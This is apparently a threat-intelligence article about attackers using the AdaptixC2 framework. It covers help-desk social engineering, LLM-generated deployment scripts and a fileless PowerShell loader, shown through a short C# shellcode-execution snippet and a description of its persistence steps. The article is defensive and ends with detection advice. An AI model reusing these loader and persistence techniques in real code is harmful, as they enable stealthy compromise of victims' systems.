In May 2025, cybersecurity experts observed a significant uptick in cyber attacks utilizing AdaptixC2, an open-source command-and-control (C2) framework originally designed for penetration testing. This tool offers functionalities such as file system manipulation, process enumeration, and covert channel tunneling. Its modular architecture and extensibility through extenders have made it particularly appealing to malicious actors seeking customizable toolkits capable of evading traditional security defenses.
Palo Alto Networks researchers noted that AdaptixC2 remained largely unnoticed until threat intelligence feeds began reporting infections across multiple sectors. One early campaign involved social engineering tactics, where attackers posed as help desk personnel to initiate remote support sessions via Quick Assist. This approach tricked users into executing multi-stage PowerShell loaders, leading to in-memory execution of the beacon without dropping any files, thereby bypassing endpoint detection measures and establishing persistent control over the victim’s system.
As these incidents increased, another cluster of intrusions emerged, involving AI-generated scripts designed to deploy AdaptixC2. Analysts identified stylistic markers—such as numbered comments and verbose output confirmations—that indicated code produced by large language models. These scripts not only downloaded and decrypted Base64-encoded payloads but also utilized .NET’s GetDelegateForFunctionPointer to execute shellcode directly in memory. By leveraging built-in Windows APIs like VirtualProtect and CreateProcess, attackers achieved stealthy deployment and reliable persistence.
The impact of these attacks has been significant. Compromised environments have experienced lateral movement facilitated by SOCKS4/5 tunneling and port forwarding, enabling data exfiltration in small chunks to blend with normal traffic patterns. In one documented case, adversaries combined AdaptixC2 with Fog ransomware in an attack against a financial institution in Asia, demonstrating the framework’s versatility and potential to amplify downstream payloads.
Organizations relying on legacy detection systems found themselves ill-prepared for this modular, evolving threat. The graphical interface of AdaptixC2 allows attackers to map available targets and plan multi-stage operations effectively. Its encrypted configuration parameters—RC4-encrypted payloads stored alongside their keys in the PE header—enable rapid customization of communication profiles.
Infection Mechanism via Fileless PowerShell Loader
One of the most insidious elements of AdaptixC2 deployment is its fileless infection mechanism, executed entirely in memory to evade disk-based defenses. The initial vector often begins with a seemingly innocuous PowerShell script, delivered through a social engineering email or remote support prompt. Upon execution, the script invokes Invoke-RestMethod to retrieve a Base64-encoded shellcode payload from a legitimate cloud storage service.
The script then decodes this payload and calls VirtualAlloc to allocate a memory region with PAGE_EXECUTE_READWRITE permissions. Using reflection and dynamic invocation, the loader constructs a delegate pointing to the shellcode entry point:
“`csharp
var ptr = GetDelegateForFunctionPointer(shellcodePtr, typeof(Action));
((Action)ptr)();
“`
This method sidesteps the need for written executables, leaving minimal forensic artifacts. Following successful execution, the script employs CreateShortcut in the user’s Startup folder or writes a Run key to the registry under a familiar name such as “Updater,” ensuring that the beacon survives reboots.
Detection evasion is further enhanced by configurable KillDate and WorkingTime parameters, which limit beacon activity to predefined windows, and by customizable user-agent strings and HTTP headers. Security teams must therefore enrich telemetry with memory-based detections and network-behavior analytics to intercept these in-flight payloads before they fully establish their C2 channels. Continuous monitoring for dynamic invocation APIs and anomalous PowerShell child processes remains critical to disrupting this modern, fileless infection chain.
